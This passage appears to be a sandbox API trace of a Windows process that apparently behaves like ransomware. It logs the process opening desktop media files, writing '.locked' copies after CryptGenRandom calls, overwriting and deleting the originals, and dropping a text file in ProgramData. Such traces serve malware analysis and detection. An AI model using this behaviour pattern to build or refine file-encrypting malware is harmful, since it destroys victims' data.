lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0320.342] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.368] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.370] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.394] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.404] SetEvent (hEvent=0x1ac) returned 1 [0320.404] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.734] SetEvent (hEvent=0x1e8) returned 1 [0320.734] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0320.834] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.834] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0320.840] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.840] SetEvent (hEvent=0x1e8) returned 1 [0320.840] SetEvent (hEvent=0x20c) returned 1 [0320.840] SetEvent (hEvent=0x214) returned 1 [0320.840] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0320.841] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0320.842] SetEvent (hEvent=0x1e8) returned 1 [0320.842] SetEvent (hEvent=0x20c) returned 1 [0320.842] SetEvent (hEvent=0x214) returned 1 [0320.842] SetEvent (hEvent=0x1dc) returned 1 [0320.842] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) Thread: id = 435 os_tid = 0xb0c [0259.044] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x332eff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x332eff58*=0x194) returned 1 [0259.044] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x190 [0259.045] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.315] SetEvent (hEvent=0x14c) returned 1 [0259.315] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.429] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.571] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.744] SetEvent (hEvent=0x184) returned 1 [0259.746] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0259.773] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.773] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0259.773] SetEvent (hEvent=0x150) returned 1 [0259.773] SetEvent (hEvent=0x134) returned 1 [0259.773] SetEvent (hEvent=0x184) returned 1 [0259.773] SetEvent (hEvent=0x104) returned 1 [0259.775] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0259.832] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.832] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0259.860] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.860] SetEvent (hEvent=0x104) returned 1 [0259.860] SetEvent (hEvent=0x184) returned 1 [0259.861] SetEvent (hEvent=0x14c) returned 1 [0259.861] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.916] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0259.917] SetEvent (hEvent=0x150) returned 1 [0259.917] SetEvent (hEvent=0x14c) returned 1 [0259.935] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0259.946] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.946] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0259.946] SetEvent (hEvent=0x14c) returned 1 [0259.952] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0259.987] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0259.987] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\1TSkQagxs.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1tskqagxs.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0259.988] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12637d9c | out: lpMode=0x12637d9c) returned 0 [0259.988] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0260.056] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0260.056] SetEvent (hEvent=0x184) returned 1 [0260.056] SetEvent (hEvent=0x104) returned 1 [0260.056] SetEvent (hEvent=0x134) returned 1 [0260.056] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0260.098] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0260.098] SetEvent (hEvent=0x150) returned 1 [0260.098] SetEvent (hEvent=0x134) returned 1 [0260.104] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0260.141] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0260.142] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0260.142] SetEvent (hEvent=0x134) returned 1 [0260.143] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0260.154] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0260.154] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x0 [0260.186] SetEvent (hEvent=0x14c) returned 1 [0260.186] SetEvent (hEvent=0x104) returned 1 [0260.186] SetEvent (hEvent=0x134) returned 1 [0260.187] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0260.205] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0260.205] SetEvent (hEvent=0x150) returned 1 [0260.206] SetEvent (hEvent=0x134) returned 1 [0260.206] SetEvent (hEvent=0x104) returned 1 [0260.206] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\EMZ6NoSJq0-2xx6IW.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\emz6nosjq0-2xx6iw.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0260.241] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0260.241] WriteFile (in: hFile=0x188, lpBuffer=0x12b20000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x12b20000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0260.296] CloseHandle (hObject=0x188) returned 1 [0260.420] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\EMZ6NoSJq0-2xx6IW.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\emz6nosjq0-2xx6iw.wav")) returned 1 [0260.705] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0260.711] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390260*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x12390260*, lpNumberOfCharsWritten=0x1265da24*=0xb) returned 1 [0260.713] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\eT_8y6.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\et_8y6.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0260.713] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0260.713] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\eT_8y6.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\et_8y6.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0261.474] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0261.919] SetEvent (hEvent=0x220) returned 1 [0261.919] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0261.919] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0262.987] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0262.987] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0262.987] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0262.987] WriteFile (in: hFile=0x228, lpBuffer=0x12653000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x12653000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0262.990] ReadFile (in: hFile=0x1f4, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1265dd68*=0x880, lpOverlapped=0x0) returned 1 [0262.991] WriteFile (in: hFile=0x228, lpBuffer=0x12653000*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x12653000*, lpNumberOfBytesWritten=0x1265dd78*=0x880, lpOverlapped=0x0) returned 1 [0263.025] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0266.034] ReadFile (in: hFile=0x1f4, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0266.034] CloseHandle (hObject=0x228) returned 1 [0266.036] CloseHandle (hObject=0x1f4) returned 1 [0266.036] SetEvent (hEvent=0x1d0) returned 1 [0266.036] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0269.430] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\1TSkQagxs.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1tskqagxs.mp3")) returned 1 [0270.033] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e0a0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12639a24, lpReserved=0x0 | out: lpBuffer=0x1263e0a0*, lpNumberOfCharsWritten=0x12639a24*=0xb) returned 1 [0270.068] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0270.103] SetEvent (hEvent=0x12c) returned 1 [0270.103] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0270.116] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.573] SetEvent (hEvent=0x104) returned 1 [0273.573] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.624] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.635] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.660] SetEvent (hEvent=0x1b8) returned 1 [0273.660] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.678] SetEvent (hEvent=0x22c) returned 1 [0273.678] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.692] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0273.695] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.695] SetEvent (hEvent=0x1dc) returned 1 [0273.695] SetEvent (hEvent=0x22c) returned 1 [0273.695] SetEvent (hEvent=0x1b8) returned 1 [0273.695] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.708] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0273.709] SetEvent (hEvent=0x150) returned 1 [0273.709] SetEvent (hEvent=0x22c) returned 1 [0273.709] SetEvent (hEvent=0x1b8) returned 1 [0273.709] SetEvent (hEvent=0x1dc) returned 1 [0273.713] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0273.714] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.714] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0273.714] SetEvent (hEvent=0x1b8) returned 1 [0273.714] SetEvent (hEvent=0x1dc) returned 1 [0273.715] SetEvent (hEvent=0x22c) returned 1 [0273.717] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0273.729] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.729] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0273.823] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0273.823] SetEvent (hEvent=0x1ac) returned 1 [0273.823] SetEvent (hEvent=0x104) returned 1 [0273.823] SetEvent (hEvent=0x214) returned 1 [0273.823] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0274.012] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0274.012] SetEvent (hEvent=0x150) returned 1 [0274.012] SetEvent (hEvent=0x214) returned 1 [0274.012] SetEvent (hEvent=0x104) returned 1 [0274.012] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_riLQBNOxB3yhpHCkj.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_rilqbnoxb3yhphckj.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0274.115] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0276.000] SetEvent (hEvent=0x220) returned 1 [0276.000] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0276.000] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0276.692] WriteFile (in: hFile=0x1f8, lpBuffer=0x12b20000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x12b20000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0276.729] CloseHandle (hObject=0x1f8) returned 1 [0276.882] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0277.908] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0277.923] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0277.930] SetEvent (hEvent=0x184) returned 1 [0277.930] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0277.973] SetEvent (hEvent=0x12c) returned 1 [0277.973] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0279.926] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e0e0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x1263e0e0*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0280.128] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\zMPTOdNQ.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\zmptodnq.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0280.128] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0280.128] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\zMPTOdNQ.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\zmptodnq.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0280.443] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0280.620] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0280.620] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0280.908] SetEvent (hEvent=0x1ac) returned 1 [0280.908] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0282.063] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0282.147] SetEvent (hEvent=0x1ac) returned 1 [0282.147] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0282.207] SetEvent (hEvent=0x12c) returned 1 [0282.207] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0283.569] SetEvent (hEvent=0x14c) returned 1 [0283.580] SetEvent (hEvent=0x12c) returned 1 [0283.580] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0284.385] ReadFile (in: hFile=0x19c, lpBuffer=0x147d8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276fd68, lpOverlapped=0x0 | out: lpBuffer=0x147d8000*, lpNumberOfBytesRead=0x1276fd68*=0x17762, lpOverlapped=0x0) returned 1 [0284.390] WriteFile (in: hFile=0x1b0, lpBuffer=0x147d8000*, nNumberOfBytesToWrite=0x17762, lpNumberOfBytesWritten=0x1276fd74, lpOverlapped=0x0 | out: lpBuffer=0x147d8000*, lpNumberOfBytesWritten=0x1276fd74*=0x17762, lpOverlapped=0x0) returned 1 [0284.489] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0284.743] SetEvent (hEvent=0x214) returned 1 [0284.743] ReadFile (in: hFile=0x19c, lpBuffer=0x147d8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276fd68, lpOverlapped=0x0 | out: lpBuffer=0x147d8000*, lpNumberOfBytesRead=0x1276fd68*=0x0, lpOverlapped=0x0) returned 1 [0284.743] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0285.149] CloseHandle (hObject=0x1b0) returned 1 [0285.152] CloseHandle (hObject=0x19c) returned 1 [0285.152] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0285.152] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1276fe94 | out: lpMode=0x1276fe94) returned 0 [0285.153] WriteFile (in: hFile=0x19c, lpBuffer=0x125741e0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x1276fe64, lpOverlapped=0x0 | out: lpBuffer=0x125741e0*, lpNumberOfBytesWritten=0x1276fe64*=0x42, lpOverlapped=0x0) returned 1 [0285.153] CloseHandle (hObject=0x19c) returned 1 [0285.154] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\1s4d3CDN.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\1s4d3cdn.flv")) returned 1 [0285.716] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0286.329] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0286.465] SetEvent (hEvent=0x20c) returned 1 [0286.465] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0286.519] SetEvent (hEvent=0x184) returned 1 [0286.519] SetEvent (hEvent=0x1dc) returned 1 [0286.519] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0286.582] SetEvent (hEvent=0x220) returned 1 [0286.582] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0286.662] SetEvent (hEvent=0x134) returned 1 [0286.662] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0286.841] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\1s4d3CDN.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\1s4d3cdn.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0287.095] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0287.664] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0287.664] WriteFile (in: hFile=0x1e0, lpBuffer=0x13e4e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x13e4e000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0287.697] CloseHandle (hObject=0x1e0) returned 1 [0287.803] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0287.875] SetEvent (hEvent=0x12c) returned 1 [0287.875] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0287.932] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0288.113] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x0 [0288.127] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0288.127] SetEvent (hEvent=0x150) returned 1 [0288.128] SetEvent (hEvent=0x20c) returned 1 [0288.128] SetEvent (hEvent=0x134) returned 1 [0288.128] SetEvent (hEvent=0x1dc) returned 1 [0288.133] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0288.268] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0288.268] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0288.408] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0288.409] SetEvent (hEvent=0x1dc) returned 1 [0288.409] SetEvent (hEvent=0x12c) returned 1 [0288.409] SetEvent (hEvent=0x20c) returned 1 [0288.409] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0288.447] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0288.447] SetEvent (hEvent=0x150) returned 1 [0288.447] SetEvent (hEvent=0x20c) returned 1 [0288.447] SetEvent (hEvent=0x12c) returned 1 [0288.450] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\P-STq-jQ5hYtJhIu5S.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\p-stq-jq5hytjhiu5s.ots"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0288.514] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0288.621] SetEvent (hEvent=0x150) returned 1 [0288.621] SetEvent (hEvent=0x1dc) returned 1 [0288.621] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12659e88 | out: lpMode=0x12659e88) returned 0 [0288.621] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0288.914] SetEvent (hEvent=0x1b8) returned 1 [0288.914] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0288.977] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0289.010] WriteFile (in: hFile=0x1b0, lpBuffer=0x125ec050*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x1276ae64, lpOverlapped=0x0 | out: lpBuffer=0x125ec050*, lpNumberOfBytesWritten=0x1276ae64*=0x48, lpOverlapped=0x0) returned 1 [0289.010] CloseHandle (hObject=0x1b0) returned 1 [0289.012] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\xxY CYyYbKsjdn.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\xxy cyyybksjdn.swf")) returned 1 [0289.054] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\xxY CYyYbKsjdn.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\xxy cyyybksjdn.swf"), dwDesiredAccess=0x40000000, 